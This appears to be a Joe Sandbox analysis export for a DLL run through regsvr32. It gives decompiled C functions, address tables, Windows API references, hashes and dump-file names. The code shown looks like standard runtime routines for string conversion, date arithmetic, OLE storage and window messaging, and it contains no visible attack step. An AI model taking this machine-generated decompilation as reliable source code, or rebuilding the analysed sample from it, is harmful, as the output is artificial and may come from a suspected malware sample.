0x1001c8c1
0x1001c8c5
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c8c7
0x1001c8c7
0x1001c8c7
0x1001c8ca
0x1001c8cc
0x00000000
0x00000000
0x1001c8d1
0x1001c8d3
0x1001c8d5
0x1001c8db
0x1001c8db
0x1001c8dd
0x1001c8e0
0x00000000
0x00000000
0x00000000
0x1001c8e2
0x1001c8d7
0x1001c8d9
0x00000000
0x00000000
0x00000000
0x1001c8d9
0x1001c8c7
0x1001c897
0x1001c899
0x00000000
0x1001c899
0x1001c883
0x1001c883
0x00000000
0x1001c927
0x1001c927
0x1001c93a
0x1001c93c
0x1001c93f
0x1001c941
0x00000000
0x00000000
0x1001c947
0x1001c953
0x1001c958
0x1001c95d
0x1001c960
0x1001c982
0x1001c985
0x1001c987
0x1001c9a1
0x1001c9ad
0x1001c9b3
0x1001c9b5
0x1001ca6c
0x1001ca6c
0x1001ca70
0x1001ca72
0x1001ca75
0x1001ca7a
0x1001ca7b
0x00000000
0x1001ca7b
0x1001c9d0
0x1001c9d2
0x1001c9d5
0x1001c9d7
0x00000000
0x00000000
0x1001c9dd
0x1001c9ed
0x1001c9f2
0x1001c9f5
0x1001c9f7
0x1001c9fa
0x1001ca18
0x1001ca1a
0x1001ca33
0x1001ca40
0x1001ca46
0x1001ca48
0x1001ca5c
0x1001ca5c
0x1001ca5f
0x1001ca63
0x1001ca65
0x1001ca66
0x1001ca6b
0x00000000
0x1001ca1c
0x1001ca26
0x1001ca28
0x1001ca2a
0x00000000
0x00000000
0x1001ca2c
0x00000000
0x1001ca2c
0x1001c989
0x1001c98d
0x1001c992
0x1001c993
0x1001c996
0x1001c998
0x00000000
0x00000000
0x1001c99e
0x00000000
0x1001c99e
0x1001c987
0x1001c874

APIs

CompareStringW.KERNEL32(00000000,00000000,1002E9CC,00000001,1002E9CC,00000001,1002FA80,00000040,1001C297,?,00000001,?,00000000,?,00000000,?), ref: 1001C7EA
GetLastError.KERNEL32(?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC,1002F7B0,00000018,10019779,1002F7C0,00000008,100136D4), ref: 1001C7FC
GetCPInfo.KERNEL32(00000000,00000000,1002FA80,00000040,1001C297,?,00000001,?,00000000,?,00000000,?,?,1001B1DE,00000000,00000000), ref: 1001C8A6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C934
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9AD
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100108AC,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100108AC,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001CA40

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$CompareErrorInfoLastString
String ID:
API String ID: 1773772771-0
Opcode ID: c2a9654bce04bb3dfd3ae6f70a3aadc38838c364b5b5f22daabd5658bc680001
Instruction ID: 34c776e7f8faf31f0108240468111debbd61bad935cb1227d3b7454dc675b75e
Opcode Fuzzy Hash: c2a9654bce04bb3dfd3ae6f70a3aadc38838c364b5b5f22daabd5658bc680001
Instruction Fuzzy Hash: 55B1887190025EAFCB12CFA4DC82E9E7BB5FF45794F64011AF900AA2A1DB31D991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100134EA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E100134EA(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x10037c4c + _t145 * 4));
							_v20 = _t138;
							if((E100197E0(_v16, _v12, 4, 0) | _t138) != 0 || (E100197E0(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E100197E0(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013440(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013440(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013440(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E10013400(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E10013400(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E10013400( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E10013400( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018F3F( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E1001974B(_t150, _t169);
								_t109 =  *0x10037b68; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E10013747(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x10037b70; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E10013747(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}

0x100134ea
0x100134f3
0x100134f5
0x100134f8
0x100134f9
0x100134fb
0x100134fe
0x10013501
0x10013730
0x10013730
0x10013730
0x00000000
0x10013512
0x10013512
0x10013516
0x00000000
0x1001352c
0x1001352c
0x10013531
0x10013538
0x1001353b
0x1001353c
0x1001353e
0x10013540
0x10013541
0x10013544
0x10013547
0x1001354c
0x10013551
0x10013555
0x10013558
0x10013558
0x1001355c
0x10013560
0x00000000
0x10013572
0x10013572
0x10013576
0x00000000
0x00000000
0x00000000
0x00000000
0x10013576
0x10013587
0x10013587
0x10013587
0x10013598
0x1001359c
0x1001359f
0x100135ae
0x100135d1
0x100135dd
0x00000000
0x00000000
0x00000000
0x100135df
0x100135df
0x100135e2
0x100135e4
0x100135e8
0x100135e8
0x100135ec
0x100135f2
0x100135f7
0x100135f8
0x100135fb
0x100135fd
0x1001360a
0x1001360e
0x10013611
0x1001361f
0x10013627
0x1001362a
0x1001362d
0x1001363e
0x10013644
0x1001365b
0x10013660
0x1001366a
0x10013671
0x1001367a
0x1001367d
0x1001367f
0x10013688
0x10013694
0x1001369a
0x1001369e
0x100136aa
0x100136ad
0x100136b4
0x100136b9
0x100136bd
0x100136bf
0x100136c2
0x100136c4
0x100136c7
0x100136ca
0x100136cd
0x10013717
0x1001371c
0x1001371f
0x00000000
0x00000000
0x10013721
0x1001372b
0x00000000
0x1001372c
0x100136cf
0x100136d4
0x100136d9
0x100136da
0x100136e1
0x100136e4
0x100136ec
0x00000000
0x00000000
0x100136ee
0x100136f1
0x100136f3
0x100136fc
0x10013701
0x10013702
0x10013709
0x1001370c
0x00000000
0x00000000
0x00000000
0x00000000
0x100136f3
0x100135ae
0x10013531
0x10013516

APIs

__allrem.LIBCMT ref: 100135A2
__allrem.LIBCMT ref: 100135BA
__allrem.LIBCMT ref: 100135D6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013611
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001362D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013644

Part of subcall function 1001974B: __lock.LIBCMT ref: 10019763

Strings

E, xrefs: 10013568

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
String ID: E
API String ID: 4106114094-3568589458
Opcode ID: 0a611df709a13b512d76e6ce74004cc72a69620633ca5c9709cb14a32ee90e18
Instruction ID: d223622ab2a34d536ca179d9b108071d2b4ae26b01bf850aeccba7f7437b6f17
Opcode Fuzzy Hash: 0a611df709a13b512d76e6ce74004cc72a69620633ca5c9709cb14a32ee90e18
Instruction Fuzzy Hash: 63717DB5E00619AFEB59CFA8CC81B9EB7B6FB44714F14C169F510EB281D774EA808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC6B Relevance: 12.3, APIs: 8, Instructions: 303
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000BC6B(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011A8C(E1002ABDA, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A68E(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x1002fad8, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A894(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x1002fba8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x1002fc28, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								E10025803(_t228 - 0x74, _t214);
								 *(_t228 - 4) = 0;
								E1001D864(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E100257BE(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x1002fc38);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}

0x1000bc70
0x1000bc80
0x1000bc91
0x1000bc94
0x1000bc9b
0x1000bc9e
0x1000bf72
0x1000bf78
0x1000bf80
0x1000bf80
0x1000bcaa
0x1000bcad
0x1000bcb0
0x1000bcb3
0x1000bcbc
0x1000bcc4
0x1000bcc7
0x1000bcfa
0x1000bcfa
0x1000bcff
0x1000bd64
0x1000bd67
0x1000bdd3
0x1000bdd3
0x1000bdd7
0x1000bde1
0x1000bde3
0x1000bde5
0x1000bf34
0x1000bf37
0x1000bf51
0x1000bf51
0x1000bf56
0x1000bf5b
0x1000bf5b
0x1000bf61
0x1000bf68
0x1000bf68
0x1000bf6f
0x00000000
0x1000bf6f
0x1000bf39
0x1000bf39
0x1000bf3d
0x1000bf44
0x1000bf47
0x1000bf4c
0x1000bf4f
0x1000bf4f
0x00000000
0x1000bf3d
0x1000bdeb
0x1000bded
0x1000be4d
0x1000be50
0x1000beff
0x1000bf06
0x1000bf06
0x1000bf09
0x1000bf0c
0x1000bf0f
0x1000bf12
0x00000000
0x00000000
0x1000bf17
0x1000bf19
0x1000bf20
0x1000bf22
0x1000bf31
0x1000bf31
0x1000bf20
0x00000000
0x1000bf17
0x1000be5a
0x1000be5d
0x1000be5f
0x1000be62
0x1000be9b
0x1000be9b
0x1000bea2
0x1000bea5
0x1000bea5
0x1000bea8
0x1000beab
0x00000000
0x00000000
0x1000bead
0x1000beb6
0x1000bebc
0x1000bebe
0x1000bec1
0x00000000
0x00000000
0x1000bec3
0x1000becf
0x1000bed2
0x1000bed8
0x1000beda
0x1000bedd
0x1000bedf
0x1000beeb
0x1000beee
0x1000bef4
0x1000bef4
0x1000bef7
0x1000be42
0x1000be45
0x00000000
0x1000be45
0x1000be64
0x1000be6b
0x1000be6d
0x1000be73
0x1000be75
0x1000be78
0x00000000
0x00000000
0x1000be7b
0x1000be81
0x1000be83
0x00000000
0x00000000
0x1000be8d
0x1000be93
0x00000000
0x1000be93
0x1000be66
0x1000be69
0x00000000
0x00000000
0x00000000
0x1000be69
0x1000bdef
0x1000bdf6
0x1000bdf9
0x1000bdff
0x1000be01
0x1000be04
0x00000000
0x00000000
0x1000be0a
0x1000be17
0x1000be1a
0x1000be20
0x1000be22
0x1000be25
0x1000be27
0x1000be33
0x1000be36
0x1000be3c
0x1000be3c
0x1000be3f
0x00000000
0x1000be3f
0x1000bd69
0x1000bd69
0x1000bd6d
0x1000bd77
0x1000bd79
0x1000bd7b
0x00000000
0x1000bd7d
0x1000bd7d
0x1000bd7f
0x1000bd9b
0x1000bda7
0x1000bdaa
0x1000bdaf
0x1000bdb9
0x1000bdbc
0x1000bdbc
0x1000bdbc
0x1000bdc3
0x1000bdc6
0x1000bd81
0x1000bd81
0x1000bd8a
0x1000bd8a
0x1000bdcb
0x00000000
0x1000bdcb
0x1000bd7b
0x1000bd04
0x00000000
0x00000000
0x1000bd0a
0x1000bd11
0x1000bd12
0x1000bd17
0x1000bd1c
0x00000000
0x00000000
0x1000bd20
0x1000bd21
0x1000bd22
0x1000bd23
0x1000bd2c
0x00000000
0x1000bd2e
0x1000bd3d
0x1000bd40
0x1000bd43
0x1000bd50
0x1000bd53
0x1000bd59
0x1000bd5c
0x00000000
0x1000bd5c
0x1000bd2c
0x1000bcc9
0x1000bccd
0x1000bcd4
0x1000bcdb
0x00000000
0x00000000
0x1000bce0
0x1000bcec
0x1000bcf1
0x1000bcf4
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000BC70

Part of subcall function 1000A68E: CoGetClassObject.OLE32(?,?,00000000,1002FB78,?), ref: 1000A6AE

Part of subcall function 10025803: __EH_prolog.LIBCMT ref: 10025808

Part of subcall function 100257BE: __EH_prolog.LIBCMT ref: 100257C3

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BDF9
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BE1A
GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BE6D
GlobalLock.KERNEL32 ref: 1000BE7B
GlobalUnlock.KERNEL32(?), ref: 1000BE93
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BEB6
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BED2

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 76f195cb7df75b09fefa107cbb8d515ebf8efbf6e38d7119c82f429092a27cfa
Instruction ID: 81fc4a865cc177b0a24fd02293c021347662990eff55a4ea9121e9fb8e92f515
Opcode Fuzzy Hash: 76f195cb7df75b09fefa107cbb8d515ebf8efbf6e38d7119c82f429092a27cfa
Instruction Fuzzy Hash: 9FC12870A0064AEFDB10DF64C888EAEBBB9FF88780B20455AF911EB255D771D941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 100259DB Relevance: 12.1, APIs: 8, Instructions: 134
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100259DB(void* __ebx, void* __ecx, void* __edi) {
				int _t24;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				struct HWND__* _t32;
				long _t33;
				struct HWND__* _t34;
				void* _t35;
				struct HWND__* _t36;
				struct HWND__* _t37;
				void* _t39;
				void* _t42;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t55;
				struct HWND__* _t56;
				struct HWND__* _t58;
				struct HWND__* _t59;
				void* _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr _t63;
				void* _t67;
				void* _t70;

				_t55 = __edi;
				_t42 = __ebx;
				E10011A8C(E1002AEA0, _t67);
				_push(__ecx);
				_push(__ecx);
				_t47 = E1001F51F(0x10);
				 *((intOrPtr*)(_t67 - 0x14)) = _t47;
				_t24 = 0;
				 *(_t67 - 4) = 0;
				if(_t47 != 0) {
					_push( *((intOrPtr*)(_t67 + 0xc)));
					_push( *((intOrPtr*)(_t67 + 8)));
					_t24 = E100107F0(_t47);
				}
				 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t67 - 0x10)) = _t24;
				E100125AC(_t67 - 0x10, 0x100334e4);
				asm("int3");
				_t27 =  *((intOrPtr*)(_t47 + 0x74));
				if(_t27 == 0) {
					_t61 = E10006E47();
					_t30 =  *((intOrPtr*)( *_t61 + 0x120))();
					_t49 = _t61;
					_t62 = _t60;
					if(_t30 != 0) {
						_push(_t62);
						_t63 = _t49;
						_t31 =  *((intOrPtr*)(_t63 + 0x60));
						if(_t31 == 0) {
							_t49 = _t63;
							_pop(_t62);
							goto L9;
						} else {
							if(_t31 != 0x3f107) {
								_t39 = E10027747();
								_t31 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xac))( *((intOrPtr*)(_t63 + 0x60)), 1);
							}
							return _t31;
						}
					} else {
						L9:
						_push(_t49);
						_push(_t42);
						_push(_t67);
						_push(_t62);
						_push(_t55);
						 *((intOrPtr*)(_t70 + 0x10)) = _t49;
						_t32 = GetCapture();
						while(1) {
							_t56 = _t32;
							if(_t56 == 0) {
								break;
							}
							_t33 = SendMessageA(_t56, 0x365, 0, 0);
							if(_t33 == 0) {
								_t32 = E10021709(_t56);
								continue;
							}
							L25:
							return _t33;
							goto L31;
						}
						_t34 = GetFocus();
						while(1) {
							_t58 = _t34;
							if(_t58 == 0) {
								break;
							}
							_t33 = SendMessageA(_t58, 0x365, 0, 0);
							if(_t33 == 0) {
								_t34 = E10021709(_t58);
								continue;
							}
							goto L25;
						}
						_t35 = E1002174E( *((intOrPtr*)(_t70 + 0x10)));
						if(_t35 != 0) {
							_t36 =  *(_t35 + 0x1c);
						} else {
							_t36 = 0;
						}
						_t37 = GetLastActivePopup(_t36);
						while(1) {
							_t59 = _t37;
							_push(0);
							if(_t59 == 0) {
								break;
							}
							_t33 = SendMessageA(_t59, 0x365, 0, ??);
							if(_t33 == 0) {
								_t37 = E10021709(_t59);
								continue;
							}
							goto L25;
						}
